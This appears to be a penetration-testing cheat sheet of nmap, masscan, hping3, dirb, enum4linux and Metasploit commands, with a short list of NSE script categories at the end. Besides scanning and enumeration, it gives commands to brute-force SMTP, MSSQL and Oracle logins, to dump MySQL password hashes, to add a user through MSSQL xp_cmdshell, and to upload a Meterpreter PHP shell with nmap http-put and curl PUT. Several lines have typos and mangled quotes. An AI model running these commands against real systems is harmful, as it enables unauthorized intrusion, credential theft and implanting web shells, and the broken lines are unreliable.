locate -r '\.nse$' 

locate -r '\.nse$' | xargs grep categories

locate -r '\.nse$' | xargs grep categories | grep 'default\|version'

locate -r '\.nse$' | xargs grep categories | grep 'default\|version' | grep smb

locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb

nmap -sV --script="version,discovery"


Print Host interfaces and Routes

nmap --iflist

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 
************************INTERFACES************************
DEV  (SHORT) IP/MASK          TYPE     UP MAC
lo   (lo)    127.0.0.1/8      loopback up
eth0 (eth0)  192.168.0.100/24 ethernet up xx:xx:xx:xx:xx
**************************ROUTES**************************
DST/MASK      DEV  GATEWAY
192.168.0.0/0 eth0
169.254.0.0/0 eth0

NMAP http://www.sh1katagana1.com/hacking-cheat-sheets.html
======

nmap -sV --script="version,discovery"

[+] NMAP Update

nmap --script-updatedb

[+] NMAP Script Help

 nmap --script-help "ssh-*"
                              nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p22 --script=sshv1 
                              
 nmap --script-help "smtp-*
                              nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p25 --script=smtp-brute,smtpenum-users
                              
 nmap --script-help "dns-*"
                              nmap --scan-delay 5s -g 53 -Pn -n -sS --open -p53 --script=dns-cache-snoop,dnsservice-discovery,dns-update,dns-zone-transfer,dns-recursion

[+] NMAP Scans

[+] Nmap ping scan
sudo nmap –sn -oA nmap_pingscan 192.168.100.0/24 (-PE)

[+] Nmap SYN/Top 100 ports Scan
nmap -sS -F -oA nmap_fastscan 192.168.0.1/24

[+] Nmap SYN/Version All port Scan - ## Main Scan
sudo nmap -sV -PN -p0- -T4 -A --stats-every 60s --reason -oA nmap_scan 192.168.0.1/24

[+] Nmap SYN/Version No Ping All port Scan
sudo nmap -sV -Pn -p0- --exclude 192.168.0.1 --reason -oA nmap_scan 192.168.0.1/24

[+] Nmap UDP All port scan - ## Main Scan
sudo nmap -sU -p0- --reason --stats-every 60s --max-rtt-timeout=50ms --max-retries=1 -oA nmap_scan 192.168.0.1/24

[+] Nmap UDP/Fast Scan
nmap -F -sU -oA nmap_UDPscan 192.168.0.1/24

[+] Nmap Top 1000 port UDP Scan
nmap -sU -oA nmap_UDPscan 192.168.0.1/24

[+] HPING3 Scans
hping3 -c 3 -s 53 -p 80 -S 192.168.0.1
Open = flags = SA
Closed = Flags = RA
Blocked = ICMP unreachable
Dropped = No response

nmap -sU -pT:21,22,23,U:53,137 X.X.X.0/24

nmap -PS445 -p445 --script=smb-enum-shares,smb-ls --script-args=ls.maxdepth=10,smbdomain=<DOMAIN>,smbuser=<USER>,smbpass='<PASSWORD>',smb-ls.share=PubShare <FQDN>

nmap  -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010

nmap  -pT:111,1039,1047,1048,2049,U:111,1039,1047,1048,2049 --open -iL all-ip.txt

nmap -iL all-ip.txt --script ssh-hostkey --script-args ssh_hostkey=all

nmap -sn -iL all-ip.txt --script ip-forwarding --script-args='target=www.google.com.tr'

nmap  -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17-010 -iL  all-ip.txt

nmap -sU -pU:123 -Pn -n --script=ntp-monlist -iL  all-ip.txt

nmap -n -vv -sV -sU -Pn -p 161,162 --script=snmp-processes,snmp-netstat X.X.X.X

nmap -n -v -sV -Pn -p 1433 --script ms-sql-brute --script-args userdb=users.txt,passdb=passwords.txt X.X.X.X

nmap -n -v -sV -Pn -p 1433 --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-password  X.X.X.X

nmap -n -v -sV -Pn -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=SQL_USER,mssql.password=SQL_PASS,ms-sql-xp-cmdshell.cmd="net user username password /add" X.X.X.X

nmap -p 443 --script ssl-ccs-injection

sqsh -S X.X.X.X -U sa

nmap -n -v -sV -Pn -p 1521 --script=oracle-enum-users --script-args sid=ORCL,userdb=users.txt X.X.X.X

nmap -n -v -sV -Pn -p 1521 --script=oracle-sid-brute X.X.X.X

NMAP PUT
=======
nmap -sV --script http-put --scrip-args http-put.url='/uploads/meterpreter.php’,http-put.file='/root/Desktop/meterpreter.php' -p 8585 [Target IP]


CURL PUT
=======
curl -i -X PUT -H “Content-Type: text/plain; charset=utf-8” -d “/root/Desktop/meterpreter.php” http://172.28.128.3:8585/uploads/meterpreter.php


tnscmd10g version -h X.X.X.X
tnscmd10g status -h X.X.X.X

nmap -n -v -sV -Pn -p 3306 --script=mysql-info,mysql-audit,mysql-enum,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-users,mysql-query,mysql-variables,mysql-vuln-cve2012-2122 X.X.X.X

mysql --host=X.X.X.X -u root -p


MASSCAN
=======

masscan -iL up_all-ip.txt --open --rate 60000 -p80,8080,8090,9090,8443,9443 | awk '{print $4}' |tee all.txt

masscan -iL up_all-ip.txt --open --rate 60000 -p1433 -sS -Pn -n --randomize-hosts -v

masscan X.X.X.X/21 -pU:161 --banners
masscan X.X.X.X/21 -pU:80 --banners
masscan X.X.X.X/21 -p8080 --banners
masscan X.X.X.X/21 -p22 --banners
masscan X.X.X.X/21 -p2222 --banners

FPING
=====
fping -c1 -gds X.X.0.0/17 2>&1| egrep -v "ICMP|xmt"

DIRB
====
dirb http://X.X.X.X/ /usr/share/dirb/wordlists/common.txt
dirb http://X.X.X.X/ /usr/share/dirb/wordlists/big.txt

ENUM
=====
enum4linux -n X.X.X.X
enum4linux -a X.X.X.X

NETBIOS NAME CHECK
===================
nmblookup -A

NBTSCAN
=======
nbtscan -r X.X.X.0/24

DNS ENUM MSF
============
use auxiliary/gather/enum_dns

use auxiliary/scanner/upnp/ssdp_amp  &  miranda use with command line

NSE script categories 
=====================

* auth: This category is for scripts related to user authentication. Nmap --script auth 10.10.10.12 

* broadcast: This is a very interesting category of scripts that use broadcast petitions to gather information. 

* brute: This category is for scripts that help conduct brute-force password auditing. 

* default: This category is for scripts that are executed when a script scan is executed (-sC). Nmap --script default 10.10.10.12 

* discovery: This category is for scripts related to host and service discovery. This category of scripts is ideal when we need to have as much information as possible for a specific target. Nmap --script discovery 10.10.10.12 

* dos: This category is for scripts related to denial of service attacks. 

* exploit: This category is for scripts that exploit security vulnerabilities. 

* external: This category is for scripts that depend on a third-party service. performs an automatic Web Whois to the target and discovers additional information like the geographical location,the name of the organization and the net range. Nmap --script external scanme.nmap.org 

* fuzzer: This category is for NSE scripts that are focused on fuzzing. 

* intrusive: This category is for scripts that might crash something or generate a lot of network noise. Scripts that system administrators may consider intrusive belong to this category. 

* malware: This category is for scripts related to malware detection. 

* safe: This category is for scripts that are considered safe in all situations. Nmap - -script safe 10.10.10.12 

* version: This category is for scripts that are used for advanced versioning. 

* vuln: This category is for scripts related to security vulnerabilities 




